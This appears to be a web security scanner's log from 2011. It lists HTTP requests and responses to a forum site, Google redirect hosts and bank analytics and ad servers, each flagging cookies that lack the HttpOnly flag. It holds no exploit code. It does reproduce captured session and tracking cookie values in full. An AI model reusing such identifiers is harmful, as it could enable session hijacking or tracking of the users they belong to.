Request
GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/330933-iptracker-200-released/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/330971-ipnexus-113-released/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__findpost__p__2073390 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/330971-ipnexus-113-released/page__view__new HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331075-so-far-disappointed-by-how-far-gallery-4-misses-the-mark/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331381-namecheap/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331381-namecheap/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331383-convert-to-ipb/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331383-convert-to-ipb/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331395-ipnexus-12-dev-update-custom-customer-fields/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331399-images/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331399-images/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331403-custom-home-page/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331413-my-ipb-site-is-on-the-front-page-of-huffington-post/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331414-help-please/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331420-how-to-upgrade/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331420-how-to-upgrade/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331420-how-to-upgrade/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /topic/331421-how-to-upgrade/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331421-how-to-upgrade/page__view__getlastpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /topic/331421-how-to-upgrade/page__view__getnewpost HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tracker/issue-21358-small-input-field-behavior-issue-after-updating-status/ HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The following cookie was issued by the application and does not have the HttpOnly flag set:
S=apphosting=lDi9AZW82FVRTOIu6kCZNw; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /og-dogfood-issue HTTP/1.1 Host: goto.ext.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Location: https://goto.google.com/og-dogfood-issue Set-Cookie: S=apphosting=lDi9AZW82FVRTOIu6kCZNw; path=/ Date: Thu, 03 Feb 2011 01:02:48 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
S=apphosting=_A7v3AzE7Pn5yk9amuUM6w; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /og-exp HTTP/1.1 Host: goto.ext.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Location: https://goto.google.com/og-exp Set-Cookie: S=apphosting=_A7v3AzE7Pn5yk9amuUM6w; path=/ Date: Thu, 03 Feb 2011 01:02:48 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /groups?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wg HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en/index.html HTTP/1.1 Host: homeloanhelp.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:13 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/ Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345 HTTP/1.1 Host: jpmorganchase.112.2o7.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 01:02:55 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi_x60zgimfehkf=[CS]v4|0-0|4D49FEBF[CE]; Expires=Tue, 2 Feb 2016 01:02:55 GMT; Domain=.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&g=none&AQE=1 X-C: ms-4.3.1 Expires: Wed, 02 Feb 2011 01:02:55 GMT Last-Modified: Fri, 04 Feb 2011 01:02:55 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www11 Content-Length: 0 Content-Type: text/plain Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; Expires=Mon, 1 Feb 2016 22:30:13 GMT; Domain=jpmorganchase.112.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: jpmorganchase.112.2o7.net Proxy-Connection: keep-alive Referer: http://www.jpmorgan.com/pages/jpmorgan Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:30:13 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A4ED7A85148B7E-600001624041C7B6[CE]; Expires=Mon, 1 Feb 2016 22:30:13 GMT; Domain=jpmorganchase.112.2o7.net; Path=/ Location: http://jpmorganchase.112.2o7.net/b/ss/jpmcglobal,jpmorgan/1/H.21/s3515906694345?AQB=1&pccr=true&vidn=26A4ED7A85148B7E-600001624041C7B6&&ndh=1&t=2/1/2011%2016%3A31%3A14%203%20360&ns=jpmorganchase&pageName=J.P.%20Morgan&g=http%3A//www.jpmorgan.com/pages/jpmorgan&r=http%3A//burp/show/20&cc=USD&c1=jpmorgan&c2=Generic_Content_Page_Template&c11=J.P.%20Morgan&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Tue, 01 Feb 2011 22:30:13 GMT Last-Modified: Thu, 03 Feb 2011 22:30:13 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www218 Content-Length: 0 Content-Type: text/plain
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adcedge/lb?site=695501&srvc=1&betr=citizensvisited_cs=1&betq=11980=427813 HTTP/1.1 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; 